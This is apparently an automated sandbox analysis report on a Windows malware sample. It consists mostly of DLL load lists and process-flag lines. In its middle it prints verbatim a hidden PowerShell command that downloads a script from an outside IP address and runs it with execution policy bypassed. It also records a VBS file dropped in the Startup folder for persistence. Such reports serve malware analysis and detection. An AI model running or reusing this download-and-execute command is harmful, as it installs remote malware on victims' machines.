Source: C:\Windows\explorer.exe	Section loaded: windowmanagementapi.dll
Source: C:\Windows\explorer.exe	Section loaded: textinputframework.dll
Source: C:\Windows\explorer.exe	Section loaded: inputhost.dll
Source: C:\Windows\explorer.exe	Section loaded: wintypes.dll
Source: C:\Windows\explorer.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\explorer.exe	Section loaded: wintypes.dll
Source: C:\Windows\explorer.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\explorer.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\explorer.exe	Section loaded: dcomp.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepositoryclient.dll
Source: C:\Windows\explorer.exe	Section loaded: d3d11.dll
Source: C:\Windows\explorer.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\explorer.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.dll
Source: C:\Windows\explorer.exe	Section loaded: dxcore.dll
Source: C:\Windows\explorer.exe	Section loaded: d2d1.dll
Source: C:\Windows\explorer.exe	Section loaded: dwrite.dll
Source: C:\Windows\explorer.exe	Section loaded: appextension.dll
Source: C:\Windows\explorer.exe	Section loaded: xmllite.dll
Source: C:\Windows\explorer.exe	Section loaded: cldapi.dll
Source: C:\Windows\explorer.exe	Section loaded: fltlib.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll
Source: C:\Windows\explorer.exe	Section loaded: dataexchange.dll
Source: C:\Windows\explorer.exe	Section loaded: apphelp.dll
Source: C:\Windows\explorer.exe	Section loaded: tiledatarepository.dll
Source: C:\Windows\explorer.exe	Section loaded: staterepository.core.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepository.dll
Source: C:\Windows\explorer.exe	Section loaded: explorerframe.dll
Source: C:\Windows\explorer.exe	Section loaded: twinui.pcshell.dll
Source: C:\Windows\explorer.exe	Section loaded: wkscli.dll
Source: C:\Windows\explorer.exe	Section loaded: wincorlib.dll
Source: C:\Windows\explorer.exe	Section loaded: cdp.dll
Source: C:\Windows\explorer.exe	Section loaded: dsreg.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.immersiveshell.serviceprovider.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepositorycore.dll
Source: C:\Windows\explorer.exe	Section loaded: mrmcorer.dll
Source: C:\Windows\explorer.exe	Section loaded: languageoverlayutil.dll
Source: C:\Windows\explorer.exe	Section loaded: bcp47mrm.dll
Source: C:\Windows\explorer.exe	Section loaded: thumbcache.dll
Source: C:\Windows\explorer.exe	Section loaded: edputil.dll
Source: C:\Windows\explorer.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\explorer.exe	Section loaded: photometadatahandler.dll
Source: C:\Windows\explorer.exe	Section loaded: ntshrui.dll
Source: C:\Windows\explorer.exe	Section loaded: cscapi.dll
Source: C:\Windows\explorer.exe	Section loaded: linkinfo.dll
Source: C:\Windows\explorer.exe	Section loaded: secur32.dll
Source: C:\Windows\explorer.exe	Section loaded: version.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptbase.dll
Source: C:\Windows\explorer.exe	Section loaded: ehstorshell.dll
Source: C:\Windows\explorer.exe	Section loaded: cscui.dll
Source: C:\Windows\explorer.exe	Section loaded: provsvc.dll
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe	Section loaded: twinui.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: twinui.dll
Source: C:\Windows\explorer.exe	Section loaded: pdh.dll
Source: C:\Windows\explorer.exe	Section loaded: applicationframe.dll
Source: C:\Windows\explorer.exe	Section loaded: stobject.dll
Source: C:\Windows\explorer.exe	Section loaded: wmiclnt.dll
Source: C:\Windows\explorer.exe	Section loaded: workfoldersshell.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\Windows\explorer.exe	Section loaded: rmclient.dll
Source: C:\Windows\explorer.exe	Section loaded: holographicextensions.dll
Source: C:\Windows\explorer.exe	Section loaded: virtualmonitormanager.dll
Source: C:\Windows\explorer.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.ui.immersive.dll
Source: C:\Windows\explorer.exe	Section loaded: abovelockapphost.dll
Source: C:\Windows\explorer.exe	Section loaded: npsm.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.web.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.shell.bluelightreduction.dll
Source: C:\Windows\explorer.exe	Section loaded: mscms.dll
Source: C:\Windows\explorer.exe	Section loaded: coloradapterclient.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.signals.dll
Source: C:\Windows\explorer.exe	Section loaded: tdh.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepositorybroker.dll
Source: C:\Windows\explorer.exe	Section loaded: mfplat.dll
Source: C:\Windows\explorer.exe	Section loaded: rtworkq.dll
Source: C:\Windows\explorer.exe	Section loaded: taskflowdataengine.dll
Source: C:\Windows\explorer.exe	Section loaded: actxprxy.dll
Source: C:\Windows\explorer.exe	Section loaded: structuredquery.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.security.authentication.web.core.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.data.activities.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.ui.shell.windowtabmanager.dll
Source: C:\Windows\explorer.exe	Section loaded: notificationcontrollerps.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.devices.enumeration.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.globalization.dll
Source: C:\Windows\explorer.exe	Section loaded: icu.dll
Source: C:\Windows\explorer.exe	Section loaded: mswb7.dll
Source: C:\Windows\explorer.exe	Section loaded: devdispitemprovider.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.networking.connectivity.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.ui.core.textinput.dll
Source: C:\Windows\explorer.exe	Section loaded: uianimation.dll
Source: C:\Windows\explorer.exe	Section loaded: windowsudk.shellcommon.dll
Source: C:\Windows\explorer.exe	Section loaded: dictationmanager.dll
Source: C:\Windows\explorer.exe	Section loaded: npmproxy.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\explorer.exe	Section loaded: mswsock.dll
Source: C:\Windows\explorer.exe	Section loaded: winnsi.dll
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\explorer.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\explorer.exe	Section loaded: schannel.dll
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll
Source: C:\Windows\explorer.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\explorer.exe	Section loaded: ntasn1.dll
Source: C:\Windows\explorer.exe	Section loaded: ncrypt.dll
Source: C:\Windows\explorer.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\explorer.exe	Section loaded: msasn1.dll
Source: C:\Windows\explorer.exe	Section loaded: dpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: rsaenh.dll
Source: C:\Windows\explorer.exe	Section loaded: gpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: pcshellcommonproxystub.dll
Source: C:\Windows\explorer.exe	Section loaded: shellcommoncommonproxystub.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptngc.dll
Source: C:\Windows\explorer.exe	Section loaded: cflapi.dll
Source: C:\Windows\explorer.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\explorer.exe	Section loaded: daxexec.dll
Source: C:\Windows\explorer.exe	Section loaded: container.dll
Source: C:\Windows\explorer.exe	Section loaded: capabilityaccessmanagerclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll

Source: C:\Users\user\Desktop\yjYJ8QncaF.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Windows\explorer.exe

Process created: C:\Windows\System32\tasklist.exe tasklist /FI "PID eq 2568"

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: yjYJ8QncaF.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.pdb source: powershell.exe, 00000004.00000002.1927473773.0000021333708000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.pdbhP{ source: powershell.exe, 00000004.00000002.1927473773.0000021333708000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Microsoft\Windows\win_update.ps1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Microsoft\Windows\win_update.ps1"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tkaxwgf0.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.cmdline"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tkaxwgf0.cmdline"

Source: C:\Users\user\Desktop\yjYJ8QncaF.exe

Code function: 0_2_000000014000D9C4 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,

0_2_000000014000D9C4

Source: yjYJ8QncaF.exe

Static PE information: section name: .code

Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	Code function: 0_2_000000014001BD3E push rbx; ret		0_2_000000014001BD3F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD9B8A458B push eax; iretd		3_2_00007FFD9B8A459D

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\tkaxwgf0.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.dll			Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 16000
Source: unknown	Network traffic detected: HTTP traffic on port 16000 -> 49733

Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
